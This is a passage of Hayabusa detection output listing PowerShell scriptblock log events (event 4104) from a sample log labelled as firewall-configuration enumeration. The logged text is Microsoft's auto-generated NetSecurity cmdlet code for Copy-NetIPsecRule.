'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parame",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains 